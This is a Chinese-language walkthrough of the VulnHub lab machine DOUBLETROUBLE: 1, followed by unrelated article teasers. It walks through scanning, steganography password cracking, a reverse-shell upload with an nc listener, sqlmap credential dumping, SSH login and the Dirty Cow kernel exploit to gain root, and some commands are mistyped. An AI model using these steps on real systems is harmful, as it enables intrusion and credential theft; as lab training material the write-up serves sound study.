DOUBLETROUBLE 1

文章目录

      • DOUBLETROUBLE: 1实战演练
          • 一、前期准备
            • 1、相关信息
          • 二、信息收集
            • 1、nmap探测目标靶机端口
            • 2、扫描目标网址目录
            • 3、访问网站,发现secret下有个图片
            • 4、将图片下载
            • 5、查看图片所含内容
            • 6、破解密码并查看
            • 7、登陆邮箱
            • 8、创建反弹shell
            • 9、上传反弹shell
            • 10、监听
            • 11、写入交互式shell
          • 三、提权
            • 1、查看权限并提权
            • 2、查看文件
            • 3、下载镜像文件
            • 4、安装镜像
          • 四、信息收集
            • 1、nmap探测目标靶机端口
            • 2、访问网站
            • 3、利用sqlmap注入
            • 4、获取数据库
            • 5、获取表名
            • 6、获取列名
            • 7、获取字段值
            • 8、SSH远程登陆
          • 五、提权
            • 1、查看文件
            • 2、查看系统信息内核
            • 3、编译源码
            • 4、切换用户并查看文件

DOUBLETROUBLE: 1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/doubletrouble-1,743/

设备名称IP地址
靶机:DOUBLETROUBLE: 1192.168.0.108
攻击机:kali192.168.0.112
二、信息收集
1、nmap探测目标靶机端口
kali@kali:~$ nmap -A 192.168.0.108
# 开放SSH:22、WEB:80端口

在这里插入图片描述

2、扫描目标网址目录
kali@kali:~$ sudo dirsearch -u "http://192.168.0.108/"

在这里插入图片描述

3、访问网站,发现secret下有个图片
http://192.168.0.108/secret/

在这里插入图片描述

4、将图片下载
kali@kali:~$ http://192.168.0.108/secret/doubletrouble.jpg

在这里插入图片描述

5、查看图片所含内容
kali@kali:~$ steghide --info doubletrouble.jpg
# 发现有密码

在这里插入图片描述

6、破解密码并查看
kali@kali:~$ steghide doubletrouble.jpg rouckyou.txt -xf 密码.txt
# 邮箱:otisrush@localhost.com
# 密码:otis666

在这里插入图片描述

7、登陆邮箱

在这里插入图片描述

8、创建反弹shell

网址:https://www.revshells.com/
在这里插入图片描述

9、上传反弹shell

在这里插入图片描述

10、监听
http://192.168.0.108/uploads/users/
kali@kali:~$ nc -lvnp 9001

在这里插入图片描述

在这里插入图片描述

11、写入交互式shell
$ python -c "import pty;pty.spawn('/bin/bash')"
三、提权
1、查看权限并提权
www-data@doubletrouble:/$ sudo -l

在这里插入图片描述

2、查看文件
root@doubletrouble:~# ls
# 发现一个镜像文件

在这里插入图片描述

3、下载镜像文件
root@doubletrouble:~# python3 -m http.server
http://192.168.0.108:8000

在这里插入图片描述
在这里插入图片描述

4、安装镜像
四、信息收集
1、nmap探测目标靶机端口
kali@kali:~$ nmap -A 192.168.0.109
# 开放SSH:22、WEB:80端口

在这里插入图片描述

2、访问网站
http://192.168.0.109

在这里插入图片描述

3、利用sqlmap注入
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms --batch

在这里插入图片描述

4、获取数据库
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms --dbs --batch

在这里插入图片描述

5、获取表名
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble --tables --batch

在这里插入图片描述

6、获取列名
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble -T users --columns --batch

在这里插入图片描述

7、获取字段值
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble -T users -C username,password --batch
# 第一个用户
# 用户名:montreux	密码:GfsZxc1
# 第二个用户
# 用户名:clapton	密码:ZubZub99

在这里插入图片描述

8、SSH远程登陆
# 利用获取的账号密码从SSH开放的端口登陆
# 第一个用户名登录
kali@kali:~$ssh montreux@192.168.0.109
# 第二个用户吗登录
kali@kali:~$ssh clapton@192.168.0.109

在这里插入图片描述

五、提权
1、查看文件
clapton@doubletrouble:~$ ls
clapton@doubletrouble:~$ cat user.txt

在这里插入图片描述

2、查看系统信息内核

源码地址:https://github.com/FireFart/dirtycow/blob/master/dirty.c

clapton@doubletrouble:~$ uname -a
# 发现内核版本为3.2.X,有Dirty Cow漏洞

在这里插入图片描述

3、编译源码
# 将源码复制到nano dirty.c中,并创建一个root密码
clapton@doubletrouble:~$ nano dirty.c
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$./dirty root
# 部分源码,全部源码见上方源码地址
# 用户名:firefart	密码:root

在这里插入图片描述

在这里插入图片描述

4、切换用户并查看文件
clapton@doubletrouble:~$ su firefart
firefart@doubletrouble:/home/clapton# ls
firefart@doubletrouble:/home/clapton# cd
firefart@doubletrouble:~# ls
firefart@doubletrouble:~# cat root.txt

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/22367.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

失业五个月,终于有offer了!但这家公司的风评惨不忍睹,要接吗?

往年,程序员们找工作可以说是不怎么费力的,不少求职者还会比对几家offer,看薪酬、看加不加班、看通勤时间等等等等,最后选择自己最满意的那一家过去。 但是今年,情况确实完全不一样,用网友的话形容就是“往…

不同厂家对讲机耳塞耳挂/领夹型988对讲机如何写频改频点/频率能互相通信

988型号都是很多厂家代工出来的,代工出来默认的频点都不一样,有可能买回来的2个不同厂家生产的对讲机,这样它们要能通讯,必须要同频点才能互通,它一般出厂设定16个频道,长按+和-键来切换频道。 需要用到typeC 的写频线,其实是用CH430芯片的usb写频线,可以找厂家要写频线…

文件上传之,waf绕过(24)

上传参数名解析:明确哪些东西可以修改 content-disposition:一般可更改 表单的数据 name:表单参数值,不能更改 表单提交的值 filename:文件名,可以修改 上传的文件名 content-type:文件mime,…

数据库索引结构(1)概念

常见的索引 主键和二级索引 MySQL学习笔记-主键索引和二级索引_mysql中主键索引和二级索引的区别_爱因诗贤的博客-CSDN博客 MYSQL-主键索引与二级索引_mysql二级索引存在哪个文件_青苔小榭的博客-CSDN博客 采用主键索引的好处:如果元素的位置发生修改,那…

【随笔记】全志 T507 PF4 引脚无法被正常设置为中断模式的问题分析

相关信息 硬件平台:全志T507 系统版本:Android 10 / Linux 4.9.170 问题描述:PF4 无法通过标准接口设置为中断模式,而 PF1、PF2、PF3、PF5 正常可用。 分析过程 一开始以为是引脚被其它驱动占用引起,或者该引脚不具…

Mybatis中处理特殊SQL处理逻辑

文章目录 0、前言1、模糊查询2、动态表名3、获取自增的组件4、批量删除 0、前言 在MyBatis中可能会有一些特殊的SQL需要去执行,一般就是模糊查询、批量删除、动态设置表名、添加功能获取自增的主键这几种,现在分别来进行说明。 为了方便演示 &#xff0…

OA管理痛点解决:从“硬编码”到“低代码”

低代码开发平台是一种逐渐流行起来的软件开发方式,它可以以快速且简单的方式构建各种应用程序,从而帮助企业快速响应市场变化和满足不断变化的业务需求。在企业的日常管理工作中,OA系统是一种非常常见的应用程序,它可以帮助企业管…

C++每日一练:饿龙咆哮-逃离城堡(避坑指南)非负整数求和

文章目录 前言一、题目二、解题代码及思路1、思路2、代码 三、非负整数求和总结 前言 饿龙这一题要说难度嘛,还真是挺简单的,但要满分也是有坑的!本文就记录了笔者解题过程,希望能对读者使用C编程有所启发。至于非负整数求和代码…

redis高级篇三(分片集群)

一)进行测试Sentinel池: 集群的定义:所谓的集群,就是通过增加服务器的数量,提供相同的服务,从而让服务器达到一个稳定、高效的状态 之前的哨兵模式是存在着一些问题的,因为如果主节点挂了,那么sentinel集群会选举新的s…

斯坦福、Nautilus Chain等联合主办的 Hackathon 活动,现已接受报名

由 Stanford Blockchain Accelerator、Zebec Protocol、 Nautilus Chain、Rootz Lab 共同主办的黑客松活动,现已接受优秀项目提交参赛申请。 在加密行业发展早期,密码极客们就始终在对区块链世界基础设施,在发展方向的无限可能性进行探索。而…

如何用Python进行屏幕录制?

文章目录 引言gpt3.5给出的代码更换截图函数——ImageGrab.grab禁用imshow解决递归现象摄像头录制代码后期需求 引言 关于屏幕录制这个功能需求,之前用过基于ffmpeg的Capture录屏软件,但是fps拉高以后会变得很卡,声音也同样出现卡顿。也自己…

nodej+vues汽车销售4s店服务平台商城系统购物车积分兑换7z9d2

在经济快速发展的带动下,汽车服务平台的发展也是越来越快速。用户对汽车服务信息的获取需求很大。在互联网飞速发展的今天,制作一个汽车服务平台系统是非常必要的。本系统是借鉴其他人的开发基础上,用MySQL数据库和nodejs定制了汽车服务平台系…

【MySQL】事务

事务是一组操作的集合,我们将一组操作视为一个整体,所以事务里面的操作的时候要么同时成功,要么同时失败,之所以会有事务也是因为我们在实际生活中会用到 最典型的例子就是转账操作:A向B进行转账,A这边扣款成功的同时B那边一定是收款成功的,如果没有事务的话就会出现A扣款成功但…

LMS,RGB,XYZ色彩空间转换

前言 首先需要指明本文中描述的R,G,B并非通常的sRGB中的三个分量R,G,B,而是波长分别为700nm,546.1nm,435.8nm的单色红光,单色绿光,单色蓝光。sRGB中的RGB中的红色、绿色、蓝色已经不是单色光了。虽然习惯上大家都叫RGB…

网络安全里的主要岗位有哪些?小白如何快速入门?

入门Web安全、安卓安全、二进制安全、工控安全还是智能硬件安全等等,每个不同的领域要掌握的技能也不同。 当然入门Web安全相对难度较低,也是很多人的首选。主要还是看自己的兴趣方向吧。 本文就以下几个问题来说明网络安全大致学习过程👇 网…

SpringCloud微服务调用方式(RestTemplate)

服务调用方式 RPC和HTTP 无论是微服务还是SOA,都面临着服务间的远程调用。那么服务间的远程调用方式有哪些呢? 常见的远程调用方式有以下2种: RPC:Remote Produce Call远程过程调用,类似的还有 。自定义数据格式&am…

learn C++ NO.4 ——类和对象(2)

1.类的6个默认成员函数 1.1.默认成员函数的概念 在 C 中,如果没有显式定义类的构造函数、析构函数、拷贝构造函数和赋值运算符重载函数,编译器会自动生成这些函数,这些函数被称为默认成员函数。 class Date { };初步了解了默认成员函数&am…

STL-常用算法(二.拷贝 替换 算术 集合)

开篇先附上STL-常用算法(一)的链接 STL-常用算法(一.遍历 查找 排序)_小梁今天敲代码了吗的博客-CSDN博客 目录 常用拷贝和替换算法: copy函数示例:(将v1容器中的元素复制给v2) replace函数示例&#…

Java 9 - 18 各个版本新特性总结

【 Java 9 - 18 各个版本新特性总结,B站视频介绍】https://www.bilibili.com/video/BV1PT411P7Wn?vd_source5a3a58ca0e99223ffb58cddf2f3a7282 一、模块化引入 模块是 Java 9 中新增的一个组件,可以简单理解为是package的上级容器,是多个pa…

gitlab建立新分支提交,cherry-pick部分更新

gitlab介绍 GitLab是一个基于Git的在线代码托管和协作平台,提供源代码管理、单元测试、CI/CD构建、代码审查等功能。它是一个开放源代码的Git仓库管理系统,使用 Ruby on Rails 构建GitLab 不仅具有自己的 Git 仓库管理系统,还具有很多其他的…